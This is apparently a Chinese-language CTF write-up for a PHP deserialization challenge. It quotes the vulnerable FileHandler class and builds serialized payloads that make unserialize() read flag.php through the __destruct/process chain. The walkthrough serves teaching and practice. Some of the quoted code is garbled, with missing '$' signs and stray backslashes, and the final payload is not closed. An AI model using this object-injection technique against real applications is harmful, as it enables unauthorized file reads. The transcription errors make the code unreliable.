打开题目
熟悉的php,代码审计
可知这是一题反序列化类型的题目。
按照常规方法,首先,我们先将代码复制到本地进行序列化构造,
根据代码逻辑分析,咱们可知 function __construct() {
$op = "1";
$filename = "/tmp/tmpfile";
$content = "Hello World!";
$this->process();
}
_destruct()析构函数当对象被销毁时会被自动调用;所以当反序列化函数调用时,会触发这个
分析此方法内的代码逻辑,当我们需要它正确输出flag时此魔术方法调用后会接着正确调用此对象中的process()方法和output()方法,所以write()方法也可以删除不用看, protected $content属性也可直接删了。
<?
include("flag.php");
highlight_file(FILE);
class FileHandler {
protected $op;
protected $filename;
public function process() {
if($this->op == "1") {
$this->write();
} else if($this->op == "2") {
$res = $this->read();
this-\>output(res);
} else {
$this->output("Bad Hacker!");
}
}
private function read() {
$res = "";
if(isset($this->filename)) {
res = file_get_contents(this->filename);
}
return $res;
}
private function output($s) {
echo "[Result]: <br>";
echo $s;
}
function __destruct() {
if($this->op === "2")
$this->op = "1";
$this->process();
}
}
function is_valid($s) {
for($i = 0; i \< strlen(s); $i++)
if(!(ord(s\[i]) >= 32 && ord(s\[i]) <= 125))
return false;
return true;
}
if(isset($_GET{'str'})) {
str = (string)_GET['str'];
if(is_valid($str)) {
obj = unserialize(str);
}
}
根据构造函数is_valid($s) 可知,
s的值ASCII码范围得在32\<=s<=125;
再根据构造函数read()可知,
$filename值基本为flag.php
根据上述信息,构造第一个序列化值得到:
O:11:"FileHandler":3:{s:5:"*op";i:2;s:11:"*filename";s:8:"flag.php";s:10:"*content";N;}
php将属性类型换成public
<?php
include("flag.php");
highlight_file(FILE);
class FileHandler {
public $op=2;
public $filename="flag.php";
}
O:11:"FileHandler":2:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";